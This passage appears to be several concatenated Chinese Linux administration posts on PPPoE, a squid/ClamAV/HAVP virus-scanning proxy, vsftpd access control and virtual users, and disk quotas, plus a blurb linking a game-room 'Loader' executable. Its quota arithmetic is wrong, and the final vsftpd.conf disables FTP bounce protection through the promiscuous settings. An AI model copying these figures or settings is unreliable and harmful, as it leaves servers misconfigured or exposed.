，SESSION_ID仍为0x0000。PADO包必须包含一个接入设备名称类型（AC-Name）的标签（标签类型字段为0x0102）以及一个或多个服务名称类型标签，表明可向用户主机提供的服务种类。 3.用户主机在可能收到的多个PADO包中选择一个合适的接入设备，选择的原则是根据PADO中接入设备名称类型标签和服务名称类型标签的内容。然后向所选择的接入设备发送PPPOE有效发现请求（PADR）包。其CODE 字段为0x19，SESSION_ID仍为0x0000。PADR包必须包一个服务名称类型标签，确定向接入设备请求的服务种类。当一个用户主机在确定时间没有收到PADO，他会重发一个PADI，同时等待两倍的时间。这种过程可以根据需要重复多次。 4.接入设备收到PADR包后准备开始PPP会话，它发送一个PPPOE 有效发现会话确认（ PADS）包。其CODE 字段为0x65 ， SESSION_ID为接入设备所产生的一个唯一的PPPOE会话标识号码。0xffff作为预留资源，目前不能被使用作SESSION_ID。PADS包也必须包含一个服务名称类型的标签确认向用户主机提供的服务。当用户主机收到PADS包确认后，双方就进入PPP会话阶段。如果接入设备不能识别PADR中的服务名称类型的标签，则会回一个包含服务名称错误（ Service-Name-Error ） 标签的PADS ，其SESSION_ID仍然是0x0000。如果用户主机在确定时间没收到PADS包，与没收到PADO作同样处理。 还有一种PPPOE有效发现终止（PADT）包，在一个PPP会话建立后它随时可由用户主机或接入设备中任何一方发送，指示PPP会话已终止。PADT包不需要任何标签，其CODE字段为0xa7 ， SESSION_ID 为需要终止的PPP会话的会话标识号码。 安全性 为防止DOS（Denial of Service）攻击，接入设备应该可以使用AC-Cookie属性，接入设备应可以根据PADR中的源地址唯一再生成一个值，这样就而已保证PADI的源地址是真正可达，同时限制与这个地址同时连接数量。这个算法细节并没有在RFC2516中具体描述。虽然AC-Cookie在反DOS攻击方面很有效，但它并不能防止所有DOS攻击，在接入设备上也可以采用其他方法来对抗DOS。 常用PPPOE软件 PPPOE软件的作用就是连接操作系统的PPP协议和Ethernet协议，并通过PPPOE协议连接 ISPEnterNet:由NTS.COM 开发（现在已经并入Efficient Networks这个有名的设备开发制造公司），自己具备独立的PPP协议，可以不依赖操作系统的拨号网络来提供PPP协议， 具有直接通过网卡和ISP连接的能力，目前是最通用和流行的PPPOE 软件，并且支持多种操作系统，目前已经提供有Windows，Linux，MacOS的版本,并且根据功能的多少又分为100、300、500等多个系列。该软件的300系列最流行，已经被多家特大型的ISP采用，例如法国电信，中国电信，在其网站提供有30天试用版。

WinPoET:由iVasion.com 开发（现在已经改为WindRiver 公司）, 它是PPPOE 协议起草者之一，它在PPPOE软件中也占有极大的份额，许多特大型ISP也采用它。它通过操作系统的拨号网络来提供PPP协议，所以在使用上和我们使用普通56K拨号上网非常相似，它只是在后台悄悄地进行着PPPOE服务。它的网站目前停止了该软件的下载评估，软件只批量卖给ISP

RASPPPOE:个人开发的PPPOE驱动软件，小巧精干，没有自己的界面面板完全只是一个驱动程序，也是依靠操作系统拨号网络来提供PPP协议，由于它是以网络协议组件的形式来工作，所以在使用上，完全和使用老式的Modem一样简单。

Access Manager/IHS:实质就是EnterNet 300 ，只是打上了BELL的ISP接入服务部门Sympatico的商标。

squid2.6stable12+clamav+havp搭建防毒代理

squid 2.6stable12 的安装

useradd squid

./configure –prefix=/opt/squid –enable-async-io=40 –enable-storeio=”aufs,coss,diskd,ufs” –enable-useragent-log –enable-referer-log –enable-kill-parent-hack –enable-forward-log –enable-snmp –enable-cache-digests –enable-default-err-language=Simplify_Chinese –enable-poll –enable-removal-policies=”heap,lru” –enable-large-cache-files –disable-internal-dns –enable-x-accelerator-vary –enable-follow-x-forwarded-for –with-large-files –disable-ident-lookups –enable-underscore –disable-arp-acl

make && make install

cd /opt/squid mkdir cache1 cache1 chown -R squid.squid cache1 cache2 var

squid.conf的内容

http_port 3128

cache_mem 100 MB cache_swap_low 75 cache_swap_high 98

emulate_httpd_log on logformat combined %>a %ui %un [%tl] “%rm %ru HTTP/%rv” %Hs %<st “%{Referer}>h” “%{User-Agent}>h” access_log /opt/web-squid/var/logs/access.log combined redirect_rewrites_host_header off

acl all src 0.0.0.0/0.0.0.0 acl manager proto cache_object acl localhost src 127.0.0.1/255.255.255.255 acl SSL_ports port 443 563 acl Safe_ports port 80 # http

acl CONNECT method CONNECT http_access allow manager localhost http_access deny manager http_access deny !Safe_ports http_access deny CONNECT !SSL_ports http_access allow all

cache_effective_user squid cache_effective_group squid

cache_replacement_policy lru

cache_dir aufs /opt/web-squid/cache1 50 32 64 cache_dir aufs /opt/web-squid/cache2 50 32 64 cache_log /opt/web-squid/var/logs/cache.log cache_store_log none cache_swap_log /opt/web-squid/var/logs/swap.log log_ip_on_direct on pid_filename /opt/web-squid/var/logs/squid.pid visible_hostname testwebsquid logfile_rotate 5

安裝 Clam AntiVirus 首先从[url]http://www.clamav.net/\[/url\]下载clamav0.90包

useradd clamav

./configure make make install

注:安装过程中有可能会出现zlib版本不够的情况,请去[url]http://www.zlib.net/\[/url\]下载最新的zlib进行安装

安装过程: ./configure make make install

安裝 HAVP 从[url]http://www.server-side.de/download.htm\[/url\]下载havp 0.86的包

useradd havp

./configure make make install

chown -R havp.havp /var/log/havp /var/tmp/havp /var/run/havp

vi /usr/local/etc/havp/havp.config

### 注释以下这行 #REMOVETHISLINE deleteme

### ClamAV Library Scanner (libclamav) → 由 HAVP 直接取用 ClamAV 的病毒资料库 ENABLECLAMLIB true CLAMDBDIR /var/lib/clamav

### ClamAV Socket Scanner (clamd) → 交由 clamd 扫毒 (须先启动 clamd), 以上两者择一使用即可,我使用的上面那种模式) ENABLECLAMD true CLAMDSOCKET /tmp/clamd

其他效能相关的设定:

### 理論上越多的執行緒效能效能越好, 但仍需視伺服器資源而定 SERVERNUMBER 40 MAXSERVERS 200

### 只記錄 error log. 較少的 Log 記錄可減輕伺服器負擔 LOGLEVEL 0

### 不對圖片檔掃毒, 可減輕 CPU 負擔 SCANIMAGES false ### 这个是havp的监听端口,默认是8080,因为8080是tomcat的默认端口,所以我改成3129了, PORT=3129

挂载独立磁盘区 /var/tmp/havp (一定要加上 -o mand 參數)

mount -o mand /dev/hda3 /var/tmp/havp

如果沒有多餘的 device 可以掛載, 可參考以下兩種方法:

a. 用記憶體建立虛擬磁碟

mkfs -t ext2 /dev/ram0 8192 (建立 8MB RAM Disk) mount -o mand /dev/ram0 /var/tmp/havp

b. 使用硬碟空間建立虛擬磁碟

dd if=/dev/zero of=/root/havp_tmp.img bs=128K count=1 seek=1024 (建立 128MB Virtual Disk) mkfs.ext2 /root/havp_tmp.img mount -o loop,mand /root/havp_tmp.img /var/tmp/havp

ps. HAVP 可扫描的档案大小将受限于这里所挂载的磁盘空間

更新 shared libraries 资料库 (for ClamAV)

vi /etc/ld.so.conf –> 加入: /usr/local/lib ldconfig

启动 HAVP

/usr/local/sbin/havp &

squid和havp的捆绑

编辑squid.conf文件 加入如下两行

cache_peer 127.0.0.1 parent 3129 0 no-query no-digest no-netdb-exchange default cache_peer_access 127.0.0.1 allow all

到目前位置squid+clamav+havp就已经配置完成了 使用squid做代理然后去[url]http://www.eicar.org/anti\_virus\_test\_file.htm\[/url\]这个网站进行测试吧

HAVP 會直接使用 ClamAV 的 Library, 所以 ClamAV 的服務是不需要啟動的. 您只要使用 ClamAV 的 freshclam 來更新 ClamAV 的病毒碼就行了, 方法如下: 1. 以 crontab 排程: 0 0 * * * /usr/local/bin/freshclam –verbose(每天午夜更新病毒碼)

Clamav升级配置文件

vi /usr/local/clamav/etc/freshclam.conf ## ## Example config file for freshclam ## Please read the clamav.conf(5) manual before editing this file. ## This file may be optionally merged with clamav.conf. ##

# You can change the default database directory here. #DatabaseDirectory /var/lib/clamav

# Path to the log file (make sure it has proper permissions) [b]UpdateLogFile /var/log/freshclam.log[/b] # Enable verbose logging. [b]LogVerbose[/b]

# Use system logger (can work together with UpdateLogFile). [b]LogSyslog[/b]

# By default when freshclam is started by root it drops privileges and # switches to the “clamav” user. You can change this behaviour here. #DatabaseOwner clamav

# The main database mirror is database.clamav.net (this is a round-robin # DNS that points to many mirrors on the world) and in most cases you # SHOULD NOT change it. DatabaseMirror database.clamav.net

# How many attempts to make before giving up. MaxAttempts 3

# How often check for a new database. We suggest checking for it every # two hours. [b]Checks 12[/b] # Proxy settings #HTTPProxyServer myproxy.com #HTTPProxyPort 1234 #HTTPProxyUsername myusername #HTTPProxyPassword mypass

# Send the RELOAD command to clamd. #NotifyClamd [/optional/config/file/path]

# Run command after database update. #OnUpdateExecute command

# Run command if database update failed. #OnErrorExecute command

以上内容有部分是看了其他文章后加入的，并非完全本人原创

vsftpd 与TCP_wrapper 结合到一块来实现这种要求 /etc/hosts.allow 定义允许的地址: /etc/hosts.deny 定义拒绝的来源地址.

如下: /etc/hosts.allow

[root@BJFS-PIM root.adminssh]# cat /etc/hosts.allow # # hosts.allow This file describes the names of the hosts which are # allowed to use the local INET services, as decided # by the ‘/usr/sbin/tcpd’ server. # vsftpd :123.103.47.0/255.255.255.0 218.240.63.0/255.255.255.0 59.46.172.0/255.255.255.0 10.0.0.0/255.0.0.0 60.2.80.0/255.255.255.0 218.249.230.0/255.255.255.0 160.10.0.0/255.255.0.0 218.246.69.0/255.255.255.0 125.35.3.0/255.255.255.0:allow

/etc/hosts.deny如下: # # hosts.deny This file describes the names of the hosts which are # *not* allowed to use the local INET services, as decided # by the ‘/usr/sbin/tcpd’ server. # # The portmap line is redundant, but it is left to remind you that # the new secure portmap uses hosts.deny and hosts.allow. In particular # you should know that NFS uses portmap!

vsftpd : ALL : DENY

将tcp_wrappers=yes添加至 /etc/vsftpd/vsftpd.conf 中 vi /etc/vsftpd/vsftpd.conf

tcp_wrappers=YES

重新启动vsftpd [root@home vsftpd]# /sbin/service vsftpd restart Shutting down vsftpd: OK ] Starting vsftpd for vsftpd: OK ]

在Linux系统中，可以通过quota的设置来限制用户和用户组的硬盘空间配额。而磁盘配额技术在Linux操作系统的应用中是十分广泛的。例如，各个网站、ICP等为用户设置信箱大小、磁盘使用空间、虚拟主机等都用到了磁盘配额技术。下面我们把介绍Linux磁盘配额的配置步骤：

(1)编辑/etc/fstab 在需要做quota限制的分区中加入usrquota和grpquota参数，中间以逗号隔开，常见需要限制的分区为dev/和/home。修改如下： /dev/hdb1/ext2 defaults,usrquota,grpquota 11 /dev/hdb5/home　ext2 defaults,usrquota,grpquota 11 /dev/hdb6 swap swap defaults　　　　　　　　　　　11 /dev/hdc/cdrom so9660 defaults　　　　　　　　　　　11 none/proc proc defaults 11

（2）执行“quotacheck -avug”命令 quotacheck这个命令的功能就是对“已经使用过的磁盘空间”做扫描，分析已使用磁盘上的每一个目录和文件属于哪一个用户和组，然后分别在根目录/（root）产生“userquota”和“grpquota”这两种记录文件。其中命令中参数组合“-avug”中各个参数的含义如下所示：

-a参数：表示扫描全部的磁盘 -v参数：表示在扫描（scan）磁盘时，显示扫描过程的信息 -u参数：表示扫描记录磁盘上各个用户（User）的使用的文件和目录 -g参数：表示扫描记录磁盘上各个用户组（Group）的使用的文件和目录

（3） 使用命令“edquota -u”设置用户配额 这个命令是为每一个用户组和每一个用户设置硬盘配额。用edquota这个命令来可以编辑每一个用户可用硬盘空间和文件节点数（inode）的大小。edquota的语法是： $　edquota -u 账号 假设想限制用户blue的使用空间，使用命令： $　edquota -u blue 然后会进入vi进行编辑，显示如下： Quotas for user blue: /dev/hdb5:blocks in use:11111,limits（sorf　=　0,hard =0） inodes in use:1114,limits（soft = 0,hard = 0） 假如想限制用户blue只能用10MB的硬盘空间，就把10MB换算成11112KB，然后把blocks in use这一行的soft = 0和hard = 0改成soft =11112,hard=11112。假如想限制用户blue的文件节点数只有6000个，可以把inodes in use 这一行的soft=0和hard=0改成soft=6000,hard=6000，改完之后即为： Quotas for user blue: /dev/hdb5:blocks in use:11111,limits（soft =11112,hard=11112） inodes in use:1114,limits（soft=6000,hard=6000） 然后保存起来，即完成限制该位用户的使用空间了。如想限制其他的用户请重复上述的动作。不过如果用户非常多，可以先设置一个人的quota，先设好用户blue的quota,然后到/home目录可以执行下面的命令对所有用户生效： $ cd /home $ edquota -p blue * 其中“*”代表系统中所有的用户名，用“quota -v”命令可以查看该用户可以有多大的硬盘使用空间，例如对blue用户进行察看，可以以root的身份执行： $ quota -v blue 或是用blue用户登录系统后，执行“quota -v”命令之后，可以看到如下类似的信息： Diskj quotas for user blue （uid 502） Filesystem blocks uqota limit grace files quota limit grace /dev/hdb5 11111　0　0 1114 0　0 （注：数字0代表无限使用硬盘空间，是完全没有限制的意思） 显然，可以看到用户已经用了11111个blocks，大约等于11111k≈13MB,而他的quota和limit的值是0，这代表可以无限制地使用硬盘空间，直到硬盘满了为止。同时用户blue的Home Directory也已经有了1114个文件，这代表着该用户至少已经使用了1114个文件数，而后面的quota和limit的值也是0，这表示用户可以无限地增加文件数目，直到整个系统的inode数全部用完为止。假如inode数被用完，但硬盘空间没有用完，这时就不能再增加任何文件到系统中。

（4） 使用“edquota -g”命令设置组使用的quota 编辑完每一个用户可使用的硬盘空间和inode数之后，接着就可以编辑用户组可使用硬盘空间和inode数。在编辑用户组的quota之前，必须注意的一点是“用户组的quota须大于这个组下面的所有的用户quota的总和”。如果组的quota小于所有用户quota的总和，则所有的用户都不能在自己的Home Directory 写入文件，所以请读者自行计算一下到底该配置多大的quota给用户组，这是非常重要的。想清楚之后，就可以编辑组使用的quota了，编辑方法是和编辑用户quota一样的。例如想给linejet这个用户组50MB的使用空是，20000个inode数，可用以下命令： $　edquota -g linejet 然后把quota限制的内容改成如下，再保存起来就完成了。 Quotas for group linejet: /dev/hdb5:blocks in use:11141,limits（soft=60000,hard=60000） inodes in use:2771,limits（soft=20000,hard=20000）

（5）使用“edquota -t”设置删除文件时间 假设blue这位用户的quota被设为3000 blocks,limit被设为4000 block。当blue所用的硬盘空间超出quota的限制3000 blocks时，系统会发出通知，提示该用户使用的硬盘空间已经超出quota了，请尽快删除文件，否则在7天后把自动删除文件。此时用户blue还可以继续写入文件，因为Home Diretoty磁盘空间还没超出4000 blocks,假如用户blue仍没有自行删除多余的文件，系统把在7天之后，自动删除文件至quota限制以内。而系统要提示用户在多久的时间内自行删除文件，就靠“edquota -t”这个命令来完成： $　edquota -t 使用root身份执行edquota -t后，出现如下信息： Time units may be:days,hours,minutes,or seconds Grace period before enforcing soft limkts for users: /dev/hdb5:blck grace period:7 days,file grace period:7 days 系统缺省是7天，可以改成任意的天数、小时、分、秒，格式如7 days、7　hours、7minutes、7 secomnds等。

这样，通过利用quota来为用户和用户组建立和管理磁盘配额的技术就给大家介绍完了。要注意的是，作为一名系统管理员在进行为用户配置磁盘配额时，一定要在了解系统情况的前提下，制定一份良好的策略，不然，会给以后系统的维护带来很大麻烦。

在旧版基础上改的 这个版本可以进CS

Loader优化版1.31

挤房间使用方法: 在房间上右键点进入房间. 挤房间的时候可以最小化完全不理会浩方, 进入房间后会有声音提示(去掉声音提示请修改AyuClient.ini, 内有说明). 挤之前一定要退出房间.(9x系统无此功能, 支持9x系统太麻烦了- -)

Download: 点击下载 备用地址 3.9MB

http://cnzleseye.china-vhost.com/hfldr131.exe

Vsftpd是在UNIX/Linux中非常安全且快速的FTP服务器，相对于本地（local_user）用户来说，虚拟用户只是相对于FTP服务器而言才有的用户，虚拟用户只能访问FTP服务器所提供的资源，这大大增强系统本身的安全性。相对于匿名用户而言，虚拟用户需要用户名和密码才能获取 FTP服务器中的文件，增加了对用户和下载的可管理性。对于考虑到主机安全和管理方便的FTP站点来说，虚拟用户是一种极好的解决方案。

Vsftpd是在UNIX/Linux中非常安全且快速的FTP服务器，vsftpd的官方网站：http://vsftpd.beasts.org/上说：Probably the most secure and fastest FTP server for UNIX-like systems。相对于本地（local_user）用户而言，虚拟用户只是相对于FTP服务器而言才有的用户，虚拟用户只能访问FTP服务器所提供的资源，这大大增强系统本身的安全性。相对于匿名用户而言，虚拟用户需要用户名和密码才能获取FTP服务器中的文件，增加了对用户和下载的可管理性。对于考虑到主机安全和管理方便的FTP站点来说，虚拟用户是一种极好的解决方案。对于局域网来说，开放匿名用户也不会对安全影响过大，所以我们提供一种匿名用户和虚拟用户两种并存的解决方案。

本文档基于SuSE Linux 10.1和vsftpd-2.0.4测试成功，如果平台不同或者版本有异，可能稍有出入。本文参考了vsftpd官方的文档（英文）以及 www.chinaunix.net上的文章，感谢这些人的付出，因本人英文水平太低，所以如果有译文不当之处敬请指正，我的EMAIL： zhangyingda@gmail.com，也可到网站论坛上讨论：http://freeedu.kmip.net。

一、安装
下载软件包，解压后，
Shell>cd /srv/ftp/pub/vsftpd-2.0.4
shell>make
shell>make install
将会安装以下文件：
/usr/local/sbin/vsftpd;
/usr/local/man/man8/vsftpd.8
/usr/local/man/man5/vsftpd.conf.5
/etc/xinetd.d/vsftpd
程序要使用nobody用户，所以建立它
shell>useradd nobody
还要/usr/share/empey目录，建立它
shell>mkdir /usr/share/empty

二、配置
注意：vsftpd 有2种运行模式，一种是通过xinetd运行，一种是独立模式。个人认为独立模式更容易控制一些。
它的配置文件一般是在/etc/vsftpd.conf，我们在源码目录中复制就行了
shell>cp vsftpd.conf /etc/vsftpd.conf
下面是它的配置文件的官方说明：
http://vsftpd.beasts.org/vsftpd\_conf.html

在源码目录中找到EXAMPLE目录，它包括了使用vsftpd 的各种示例（详细说明请参见该目录下的README文件）。
VIRTUAL_USERS How to set up virtual users with vsftpd.
VIRTUAL_USERS_2 Advanced virtual users - different access rights.
我们参考了最后的2个，用来实现虚拟用户以及高级虚拟用户-给予不同的访问权限。

（一）使用PAM实现虚拟用户
PAM的英文全称是Pluggable Authentication Module系统，即此程序是有关执行用户鉴别和帐号维护的服务。鉴别部分通常通过一（合法性）质询-回应的交互来完成的。使用PAM，管理员可以通过不重编辑鉴定程序来定制一些使用方法。
虚拟用户是指系统上并不存在的用户，相对于真实用户来说，它有更好的安全性。

1. 创建虚拟用户
   我们准备使用pam_userdb来认识虚拟用户。这需要一个存储用户名/密码的”db”格式的通用数据库文件。要想创建一个”db”格式的通用数据库文件，首先要创建一个用户名和密码交互的文本文件，比如”logins.txt”，我们指定用户” download”使用密码” download”,” admin”使用密码” upanddownadnwrite”。我们创建了一个目录用来存储这些东西，/etc/vsftpd。
   Shell>mkdir /etc/vsftpd
   Shell>cd /etc/vsftpd
   Shell>vi /etc/vsftpd/logins.txt
   以下是logins.txt的内容
   download
   download
   admin
   upanddownadnwrite
   现在我们创建数据库文件(为防止意外请使用root用户登录)：
   Shell>db_load -T -t hash -f /etc/vsftpd/logins.txt /etc/vsftpd/vsftpd_login.db
   (这要系统上已经安装Berkeley db程序，如果没有安装，请到这个站点上下载安装 http://dev.sleepycat.com/downloads/releasehistorybdb.html。注意: 很多系统上安装了多个版本的 “db” ，vsftpd官方原文说可能要db3_load，经过测试db4_load也可以用。)
   这将会创建 /etc/vsftpd/vsftpd_login.db. 很明显你想要对它进行权限的限制
   chmod 600 /etc/vsftpd/vsftpd_login.db
   关于数据库的更多信息，查看以下文档：
   http://www.sleepycat.com/docs/utility/index.html
2. 创建一个使用数据库的PAM文件
   我们这个文件名是 vsftpd.pam. 它的内容:
   auth required /lib/security/pam_userdb.so db=/etc/vsftpd/vsftpd_login
   account required /lib/security/pam_userdb.so db=/etc/vsftpd/vsftpd_login
   它告诉PAM使用我们新建的数据库来认证用户。将这个PAM放置到PAM目录中，通常是/etc/pam.d
   cp vsftpd.pam /etc/pam.d/ftp
   (注意 – 如果你已经在/etc/vsftpd.conf中将pam_service_name设置成了 vsftpd，你就要把它复制成 /etc/pam.d/vsftpd).
3. 设置虚拟用户的文件位置
   useradd -d /ftp_server/ virtual
   ls -ld /ftp_server
   (将会出现如下结果):
   drwx—— 3 virtual virtual 4096 Jul 30 00:39 /ftp_server/

我们已经创建了一个名叫 “virtual” 主目录是”/ftp_server/“的用户。
4) 创建你的vsftpd.conf 配置文件
下面是vsftpd.conf的配置文件内容，让我们一行一行来分析它：
anonymous_enable=NO
local_enable=YES

出于安全的角度禁用了匿名（anonymous）用户，启用非匿名用户—就是我们刚才我们创建的虚拟用户“virtual“。

write_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
anon_other_write_enable=NO

这些是出于安全的目的，写命令全部被禁用了。
chroot_local_user=YES

这个是确信能将虚拟用户限制在我们上述的/ftp_server/目录中。

guest_enable=YES
guest_username=virtual

这个 guest_enable是非常重要的—它用来激活虚拟用户！ guest_username 是将所有虚拟用户映射成我们先前设置的真实用户”virtual”。这也决定了虚拟用户在文件系统中的位置，也就是”virtual”的主目录 /ftp_server/。

listen=YES
这个将vsftpd 设置成独立模式（ “standalone” mode）也就是不通过 inetd或者xinetd来运行。这意味着你直接运行vsftpd的可执行命令就可以启动它了。
将vsftpd.conf复制到 /etc/vsftpd/:
cp vsftpd.conf /etc/vsftpd/
5) 启动 vsftpd.
shell>service vsftpd start
如果你想要让它在后台运行，可以输入vsftpd &
shell>vsftpd &
如果正常，不会有什么提示，如果不正常，你将会看到一些出错提示。
如果想退出，可以使用killall
shell>killall vsftpd
6)测试
开启另一个shell对话
Shell> ftp localhost
Trying 127.0.0.1…
Connected to localhost.
220 Welcome to FREEEDU FTP service.
Name (localhost:root): download
331 Please specify the password.
Password:（此处输入密码）
230 Login successful. Have fun.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 “/“
ftp>bye

注解：
要密码时我们输入 “download”，如果出现 “failed to open directory”，不要着急，因为目录
/ftp_server/不是全局读属性(如果想更改，可以通过设置 anon_world_readable_only=NO来实现，这个默认是YES，它是用来设置匿名用户只能下载全局可读的文件)。

（二）高级虚拟用户-给予不同的访问权限
这个例子演示了如何拓展上面的例子来实现更为复杂的设置。
让我们来假设需要两类虚拟用户——一个只能浏览和下载内容，另一个不仅可以下载原有内容还可以上传新的内容。要完成这个目的，我们可以使用vsftpd强大的per-user（每用户）配置功能。
在上一个虚拟用户例子中我们创建了2个用户– download and admin，我们想让admin 有写的权限和上传新文件的权限，同时，download 则只能下载。

1. 激活per-user 配置
   要激活这个强大的功能，添加下面的一行到/etc/vsftpd.conf:
   user_config_dir=/etc/vsftpd/vuser
   如果没有目录请创建之（我们前面已经创建了,所以这步可省略）
   shell>mkdir /etc/vsftpd/vuser
2. 给予download 访问/目录下所有文件的权限
   在上一个例子的结尾，我们注意到虚拟用户只能访问有全局读属性的文件和目录。我们可以使用chmod命令来改变/ftp_server/目录的属性，然而我们还可以通过另一种方法来实现这个目的—让download有下载非全局读属性的文件的权利。
   专门为用户download设置一个配置文件来覆盖anon_world_readable_only的值：
   shell>echo “anon_world_readable_only=NO” > /etc/vsftpd/vuser/ download
   让我们来检测一下：用download登录，使用ls命令来返回目录列表！使用admin则不能。
   注意 – 如果改变了/etc/vsftpd/vsftpd.conf，就要重新启动vsftpd。 (高手级用户可以向vsftpd listener process发送 SIGHUP信号来达到目的)。
3. 给予 admin 读取 / 目录下所有文件的能力以及创建新文件的权力但不能对已经存在的文件进行干预。
   shell>echo “anon_world_readable_only=NO” > /etc/vsftpd/vuser/admin
   shell>echo “write_enable=YES” >> /etc/vsftpd/vuser/admin
   shell>echo “anon_upload_enable=YES” >> /etc/vsftpd/vuser/admin

检测一下 – 使用download登录你不能上传，使用 admin登录你就可以!
试着使用这2个用户的身份来删除一个文件- 无论哪个都不能实现。

（三）在开放虚拟用户同时开放匿名用户
可以通过修改/etc/vsftpd.conf来开放匿名用户，这对于局域网用户来说很有用，而且也没有什么安全的影响。要开放匿名用户请修改成
anonymous_enable=YES
（四）可能出现的问题及解决
如果你的机器上总不能登录可能是因为没有安装pam-devel，请用ldd命令检查生成的vsftpd文件有没有加载 /lib/libpam.so.0，如果没有请安装pam-devel，可使用rpm，也可从源代码编译安装pam。安装后，回到vsftpd的源码目录中
# make clean
# make
#make install
再次用ldd检查vsftpd，看有没有libpam.so.0。

如果你在源码目录中执行过make install，将会安装几个文件到系统中，其中就有一个/etc/xinetd.d/vsftpd，要注意这个文件，如果它其中的内容disable=NO，那么，启动vsftpd时就会出错：
500 OOPS: could not bind listening IPv4 socket
所以请你把它改成disable=YES

相关文献：
vsftpd.conf官方配置文件说明
http://www.chinaunix.net/jh/15/586793.html

我的vsftpd.conf anonymous_enable=NO pasv_promiscuous=YES port_promiscuous=YES local_enable=YES write_enable=NO anon_upload_enable=YES anon_mkdir_write_enable=YES anon_other_write_enable=NO chroot_local_user=YES guest_enable=YES guest_username=virtual listen=YES user_config_dir=/etc/vsftpd/vuser max_clients=40 max_per_ip=2